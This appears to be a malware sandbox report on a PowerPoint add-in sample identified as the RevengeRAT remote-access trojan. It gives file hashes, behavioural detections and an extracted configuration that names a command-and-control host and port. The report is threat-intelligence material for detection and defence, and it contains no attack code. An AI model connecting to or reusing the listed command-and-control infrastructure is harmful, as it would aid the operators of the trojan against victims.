Overview

overview

10

Static

static

1

d10fccc801...d.ppam

windows7-x64

10

d10fccc801...d.ppam

windows10-2004-x64

10

Sharing

Copy URL Twitter E-mail

General

  • Target

    bff801f54e0f5076505343aa501d584b6a83aa1694fae6f75d4ea3f1f43678de

  • Size

    22KB

  • Sample

    240719-z8lteathjh

  • MD5

    7ab5df4e9ff86b54251fa5a82f10e3d5

  • SHA1

    44371596e080a534112a921bd9bd006faad68631

  • SHA256

    bff801f54e0f5076505343aa501d584b6a83aa1694fae6f75d4ea3f1f43678de

  • SHA512

    84b2547d48d6e41618fc2743ade69e33aedfa7d3bf68c7b7e3f6f261e54ce5440d9ca01c76139f2d90accd9303d744e479a66e6678276b795fe584c87b7bd135

  • SSDEEP

    384:+7rV8Fbyfujup1bQWAodZVROecm09FJmazXB4aV5IupRKh/U4EWFuICiFQWA2M0D:cx8pSuboBRJcR5maGiCuU/ZE4uwWWrMC

Score
10/10
revengeratnyancatrevengetrojan

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

lua.ddns.com.br:5222

Mutex

101f19215cac

Targets

    • Target

      d10fccc801f58792d0feab8d9014a71f4553a584bde1f00e32586944f955d3fd.ppam

    • Size

      23KB

    • MD5

      aae8e2400a374294adcf96504f25180f

    • SHA1

      326f020fc3ec8a3bdcc27ba5d3d54df0029e6ff2

    • SHA256

      d10fccc801f58792d0feab8d9014a71f4553a584bde1f00e32586944f955d3fd

    • SHA512

      92afa4d86e30a7063f94b64e84ed99641a717b6a97888a2fbbb78b1da8662cbaedfe64b050047d8ba6cd1b542e2082b888e57077381d185e99f7f1e62e693eed

    • SSDEEP

      384:dXPNdo5nM3HC58UJzD6jHap59VcnksKLXHQxgIhSnH1xXcndqe+dQfmg:VPInM3Ih16DapOnksKjQxthGH1mdUQp

    Score
    10/10
    revengeratnyancatrevengetrojan

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • RevengeRAT

      Remote-access trojan with a wide range of capabilities.

      trojanrevengerat

    • Blocklisted process makes network request

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Enterprise v15

Tasks